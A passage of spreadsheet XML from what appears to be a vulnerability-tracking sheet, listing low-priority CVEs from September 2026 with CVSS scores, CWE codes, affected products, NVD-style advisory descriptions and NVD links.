          <t>undici's decompress interceptor decompresses response bodies according to the untrusted Content-Encoding header. While the number of content-encoding layers is capped, the total decompressed output size is unbounded and there is no configuration option to limit it. A malicious or faulty upstream can therefore return a small compressed payload, a compression bomb, that expands to hundreds of megabytes or more in client memory, an asymmetric resource consumption that can exhaust memory and crash the process. This affects undici versions from 7.15.0 up to 7.29.1 and from 8.0.0 up to 8.10.2. Users should upgrade to undici 7.29.1 or 8.10.2.</t>
        </is>
      </c>
      <c r="S698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84890</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B699" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87123</t>
        </is>
      </c>
      <c r="D699" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E699" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F699" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G699" s="5" t="inlineStr"/>
      <c r="H699" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I699" s="5" t="inlineStr"/>
      <c r="J699" s="5" t="inlineStr"/>
      <c r="K699" s="5" t="inlineStr"/>
      <c r="L699" s="5" t="inlineStr"/>
      <c r="M699" s="5" t="inlineStr"/>
      <c r="N699" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O699" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P699" s="5" t="inlineStr"/>
      <c r="Q699" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R699" s="5" t="inlineStr">
        <is>
          <t>hbs is an Express view engine wrapper for Handlebars. Version 4.3.0 can crash the Node.js process during output escaping when an async helper, registered with registerAsyncHelper, resolves to an object whose toHTML property is truthy but not callable. Handlebars escapeExpression calls the toHTML method on any value that has a truthy toHTML, so such a value throws a TypeError, and because the async substitution runs on a later tick outside the render function's try/catch, the throw is an uncaught exception that terminates the process without sending a response. Only version 4.3.0 is affected, since the throwing escape was introduced by the fix for CVE-2026-16231 and earlier versions do not escape async helper values. It can be triggered remotely when an async helper resolves to an externally influenced object such as parsed JSON. The issue is fixed in hbs 4.3.1, and users should upgrade to hbs 4.3.1 or later.</t>
        </is>
      </c>
      <c r="S699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87123</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B700" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87590</t>
        </is>
      </c>
      <c r="D700" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E700" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F700" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G700" s="5" t="inlineStr"/>
      <c r="H700" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I700" s="5" t="inlineStr"/>
      <c r="J700" s="5" t="inlineStr"/>
      <c r="K700" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L700" s="5" t="inlineStr"/>
      <c r="M700" s="5" t="inlineStr"/>
      <c r="N700" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O700" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P700" s="5" t="inlineStr"/>
      <c r="Q700" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R700" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Passwords in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially leak sensitive information via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87590</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B701" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89156</t>
        </is>
      </c>
      <c r="D701" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E701" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F701" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G701" s="5" t="inlineStr"/>
      <c r="H701" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I701" s="5" t="inlineStr"/>
      <c r="J701" s="5" t="inlineStr"/>
      <c r="K701" s="5" t="inlineStr">
        <is>
          <t>pcre:pcre2</t>
        </is>
      </c>
      <c r="L701" s="5" t="inlineStr"/>
      <c r="M701" s="5" t="inlineStr"/>
      <c r="N701" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O701" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P701" s="5" t="inlineStr"/>
      <c r="Q701" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R701" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48 has a pcre2_match out-of-bounds read after a JIT fallback when an attacker can provide invalid UTF data.</t>
        </is>
      </c>
      <c r="S701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89156</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B702" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81911</t>
        </is>
      </c>
      <c r="D702" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E702" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F702" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G702" s="5" t="inlineStr"/>
      <c r="H702" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I702" s="5" t="inlineStr"/>
      <c r="J702" s="5" t="inlineStr"/>
      <c r="K702" s="5" t="inlineStr"/>
      <c r="L702" s="5" t="inlineStr"/>
      <c r="M702" s="5" t="inlineStr"/>
      <c r="N702" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O702" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P702" s="5" t="inlineStr"/>
      <c r="Q702" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R702" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS versions 9.0.0 to 9.5.2 is vulnerable to Stored XSS in Board Custom Slot dialog. The custom_slot save_template endpoint authorizes the request only against the target board instance (canEditBoardContents()) and then persists the client-supplied selectedTemplateOption[collection] verbatim, rather than rebuilding the content object collection server-side and verifying that each item belongs to the authorized board's data pool. A user with permission to edit the contents of at least one board instance can therefore store a forged summary object whose description field carries a JavaScript-bearing HTML payload. The default summary template renders the description field without output encoding, so the payload executes in the browser of any user who views the affected board slot, including anonymous front-end visitors and dashboard users who preview the resulting rule or block. This can enable session or action takeover and escalation toward an administrator. Concrete CMS versions below 9 do not include the Boards feature and are not affected. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 5.8 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N. Thanks riodrwn for reporting.</t>
        </is>
      </c>
      <c r="S702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81911</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B703" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81912</t>
        </is>
      </c>
      <c r="D703" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E703" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F703" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G703" s="5" t="inlineStr"/>
      <c r="H703" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I703" s="5" t="inlineStr"/>
      <c r="J703" s="5" t="inlineStr"/>
      <c r="K703" s="5" t="inlineStr"/>
      <c r="L703" s="5" t="inlineStr"/>
      <c r="M703" s="5" t="inlineStr"/>
      <c r="N703" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O703" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P703" s="5" t="inlineStr"/>
      <c r="Q703" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R703" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS before 9.5.3 is vulnerable to Cross-Site Request Forgery in the Move Multiple Groups feature. The dashboard/users/groups/bulkupdate/confirm() endpoint moved the selected group tree nodes without validating an action token, so a state-changing group move could be processed for an authenticated user who did not initiate it. Because relocating a group under a new parent causes that group's members to inherit the parent's permissions, a forged move can change effective authorization. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 5.7 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks riodrwn for reporting.</t>
        </is>
      </c>
      <c r="S703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81912</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B704" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87910</t>
        </is>
      </c>
      <c r="D704" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E704" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F704" s="5" t="inlineStr">
        <is>
          <t>cna@python.org</t>
        </is>
      </c>
      <c r="G704" s="5" t="inlineStr"/>
      <c r="H704" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I704" s="5" t="inlineStr"/>
      <c r="J704" s="5" t="inlineStr"/>
      <c r="K704" s="5" t="inlineStr"/>
      <c r="L704" s="5" t="inlineStr"/>
      <c r="M704" s="5" t="inlineStr"/>
      <c r="N704" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O704" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P704" s="5" t="inlineStr"/>
      <c r="Q704" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="R704" s="5" t="inlineStr">
        <is>
          <t>When tarfile extracts a link on a system that doesn't support links, it falls back to extracting a member from the archive. In this case, the filter function is run twice: once for the extracted member, and once with name set to the location of the link. For one of the calls, the return value was ignored. Instead, the member should be skipped if either call returns None.</t>
        </is>
      </c>
      <c r="S704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87910</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B705" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57843</t>
        </is>
      </c>
      <c r="D705" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E705" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F705" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G705" s="5" t="inlineStr"/>
      <c r="H705" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I705" s="5" t="inlineStr"/>
      <c r="J705" s="5" t="inlineStr"/>
      <c r="K705" s="5" t="inlineStr"/>
      <c r="L705" s="5" t="inlineStr"/>
      <c r="M705" s="5" t="inlineStr"/>
      <c r="N705" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O705" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P705" s="5" t="inlineStr"/>
      <c r="Q705" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="R705" s="5" t="inlineStr">
        <is>
          <t>NetBSD contains an information disclosure vulnerability in mm_open() within sys/dev/mm.c that allows unprivileged local users to obtain real kernel virtual addresses by opening world-accessible devices such as /dev/null or /dev/zero, which incorrectly receive the PK_KMEM process flag. Attackers can exploit this misconfigured flag to bypass the CANSEE_KPTR obfuscation mechanism and read kernel virtual addresses for sensitive kernel structures including struct proc, kauth_cred, filedesc, and vmspace via sysctl KERN_PROC queries.</t>
        </is>
      </c>
      <c r="S705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57843</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B706" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77159</t>
        </is>
      </c>
      <c r="D706" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E706" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F706" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G706" s="5" t="inlineStr"/>
      <c r="H706" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I706" s="5" t="inlineStr"/>
      <c r="J706" s="5" t="inlineStr"/>
      <c r="K706" s="5" t="inlineStr"/>
      <c r="L706" s="5" t="inlineStr"/>
      <c r="M706" s="5" t="inlineStr"/>
      <c r="N706" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O706" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P706" s="5" t="inlineStr"/>
      <c r="Q706" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="R706" s="5" t="inlineStr">
        <is>
          <t>A symlink-following flaw was found in libvirt's qemuTPMEmulatorPrepareHost() function. The function uses a path-based chown() on the swtpm logfile without checking for symbolic links. A local attacker with access to the swtpm account can replace the logfile with a symlink, causing libvirtd (running as root) to transfer ownership of an arbitrary file to the swtpm user.</t>
        </is>
      </c>
      <c r="S706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77159</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B707" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78454</t>
        </is>
      </c>
      <c r="D707" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E707" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F707" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G707" s="5" t="inlineStr"/>
      <c r="H707" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I707" s="5" t="inlineStr"/>
      <c r="J707" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K70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707" s="5" t="inlineStr"/>
      <c r="M707" s="5" t="inlineStr"/>
      <c r="N707" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O707" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P707" s="5" t="inlineStr"/>
      <c r="Q707" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R707" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78454</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B708" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79945</t>
        </is>
      </c>
      <c r="D708" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E708" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F708" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G708" s="5" t="inlineStr"/>
      <c r="H708" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="I708" s="5" t="inlineStr"/>
      <c r="J708" s="5" t="inlineStr"/>
      <c r="K708" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L708" s="5" t="inlineStr"/>
      <c r="M708" s="5" t="inlineStr"/>
      <c r="N708" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O708" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P708" s="5" t="inlineStr"/>
      <c r="Q708" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R708"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S708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79945</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B709" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80056</t>
        </is>
      </c>
      <c r="D709" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E709" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F709" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G709" s="5" t="inlineStr"/>
      <c r="H709" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I709" s="5" t="inlineStr"/>
      <c r="J709" s="5" t="inlineStr"/>
      <c r="K709" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L709" s="5" t="inlineStr"/>
      <c r="M709" s="5" t="inlineStr"/>
      <c r="N709" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O709" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P709" s="5" t="inlineStr"/>
      <c r="Q709" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="R709" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Insertion of Sensitive Information into Log File vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information exposure.</t>
        </is>
      </c>
      <c r="S709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80056</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B710" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80057</t>
        </is>
      </c>
      <c r="D710" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E710" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F710" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G710" s="5" t="inlineStr"/>
      <c r="H710" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I710" s="5" t="inlineStr"/>
      <c r="J710" s="5" t="inlineStr"/>
      <c r="K710" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L710" s="5" t="inlineStr"/>
      <c r="M710" s="5" t="inlineStr"/>
      <c r="N710" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O710" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P710" s="5" t="inlineStr"/>
      <c r="Q710" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="R710" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Hard-coded Cryptographic Key vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information disclosure.</t>
        </is>
      </c>
      <c r="S710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80057</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B711" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81977</t>
        </is>
      </c>
      <c r="D711" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E711" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F711" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G711" s="5" t="inlineStr"/>
      <c r="H711" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I711" s="5" t="inlineStr"/>
      <c r="J711" s="5" t="inlineStr"/>
      <c r="K711" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L711" s="5" t="inlineStr"/>
      <c r="M711" s="5" t="inlineStr"/>
      <c r="N711" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O711" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P711" s="5" t="inlineStr"/>
      <c r="Q711" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R711" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81977</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B712" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81982</t>
        </is>
      </c>
      <c r="D712" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E712" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F712" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G712" s="5" t="inlineStr"/>
      <c r="H712" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I712" s="5" t="inlineStr"/>
      <c r="J712" s="5" t="inlineStr"/>
      <c r="K712" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L712" s="5" t="inlineStr"/>
      <c r="M712" s="5" t="inlineStr"/>
      <c r="N712" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O712" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P712" s="5" t="inlineStr"/>
      <c r="Q712" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R712" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81982</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B713" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82001</t>
        </is>
      </c>
      <c r="D713" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E713" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F713" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G713" s="5" t="inlineStr"/>
      <c r="H713" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I713" s="5" t="inlineStr"/>
      <c r="J713" s="5" t="inlineStr"/>
      <c r="K713" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L713" s="5" t="inlineStr"/>
      <c r="M713" s="5" t="inlineStr"/>
      <c r="N713" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O713" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P713" s="5" t="inlineStr"/>
      <c r="Q713" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R713" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82001</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B714" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8304</t>
        </is>
      </c>
      <c r="D714" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E714" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F714" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G714" s="5" t="inlineStr"/>
      <c r="H714" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I714" s="5" t="inlineStr"/>
      <c r="J714" s="5" t="inlineStr"/>
      <c r="K714" s="5" t="inlineStr"/>
      <c r="L714" s="5" t="inlineStr"/>
      <c r="M714" s="5" t="inlineStr"/>
      <c r="N714" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O714" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P714" s="5" t="inlineStr"/>
      <c r="Q714" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R714" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus About allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Pardus About: from 1.2.1 before 1.2.5.</t>
        </is>
      </c>
      <c r="S714" s="6" t="inlineStr">
        <is>
